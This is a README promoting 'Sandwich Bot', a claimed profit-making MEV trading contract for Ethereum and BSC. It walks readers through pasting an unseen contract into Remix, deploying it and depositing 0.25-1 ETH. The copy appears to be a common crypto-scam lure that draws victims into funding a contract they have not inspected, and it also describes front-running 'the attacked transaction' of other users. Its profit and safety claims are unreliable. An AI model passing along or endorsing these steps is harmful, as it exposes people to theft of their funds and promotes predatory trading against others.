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Earn money with Sandwich Bot (SandwichBot)

Project README

Sandwich Bot

  • Sandwich Bot is an automated trading bot designed to stay ahead of the market and capitalize on profitable transactions in the cryptocurrency space. It operates on both the Binance Smart Chain (BSC) and Ethereum networks, allowing users to leverage its functionality to execute asset operations on both platforms.

  • The bot utilizes advanced market analysis algorithms and techniques to swiftly identify and respond to emerging opportunities for profitable trades on the BSC and Ethereum networks. By monitoring price changes, trading volumes, and other relevant factors, it determines potential lucrative trades on both platforms.

  • The goal of Sandwich Bot is to outpace the market and extract profits from price differentials across various exchanges and assets on Binance Smart Chain and Ethereum. The bot automatically executes buy or sell orders based on user-defined parameters such as price limits, volumes, and timeframes on both platforms.

  • Sandwich Bot can be configured to manage risks and make decisions based on pre-defined trading strategies on both Binance Smart Chain and Ethereum. It can set stop-limits, apply portfolio management algorithms, and respond to changing market conditions to safeguard capital and optimize trading results on both platforms.

  • The entire functionality of Sandwich Bot is implemented using Solidity, operating within the blockchain environments of Binance Smart Chain and Ethereum, ensuring transparency, reliability, and operational security. Users can interact with the bot, customize its parameters, and monitor trade execution processes on both platforms through a user-friendly interface.

  • Sandwich Bot is a powerful tool for cryptocurrency traders and investors, enabling them to automate trading operations, stay ahead of the market, and extract maximum benefits from price volatility on both Binance Smart Chain and Ethereum.

  • Sandwich Bot scans projects and performs token filtering, screening out scam tokens and tokens associated with whales. It utilizes various algorithms and analysis strategies to identify and exclude dishonest projects that may pose a risk to investors.

Sandwich Bot example

exemple Sandwich

The bot only works with the main network.

Step 1: Access the Source Code

  1. Navigate to the Remix IDE:
  2. Create a new file "SandwichBot.sol".
  3. Copy this code and paste it into the Remix IDE. 1

Step 2: Compile the Code

  1. Select the Solidity compiler 0.6.12.
  2. Click 'Compile SandwichBot.sol'. 2

Step 3: Choose the Network

  1. !!Select either ETH or BSC (BNB) network.!! 3

Step 4: Deploy the Code

  1. Click 'Transact (Deploy)'

Step 5: Deposit into SandwichBot

  1. Copy your SandwichBot contract and send an amount of Ethereum for the bot's operation.
  2. Start the bot by pressing the 'Start' button. 4 5

Note: For successful transactions on the Ethereum network, you must have sufficient balance to cover the gas fees. We recommend a minimum of 0.25-1 ETH. The bot uses a small portion of its resources to pay for gas. In order to prioritize the transaction, it increases the gas price of the attacked transaction.

You can withdraw funds by clicking the 'Stop' and 'Withdrawal' button.*

UPD: If you have closed the Remix IDE website or accidentally rebooted your computer, you can still access all the bot's functions through Etherscan You will need to verify the bot contract on Etherscan, and you will have access to the same functions as you would through the Remix IDE website.

Open Source Agenda is not affiliated with "SandwichBot" Project. README Source: ricarddan/SandwichBot

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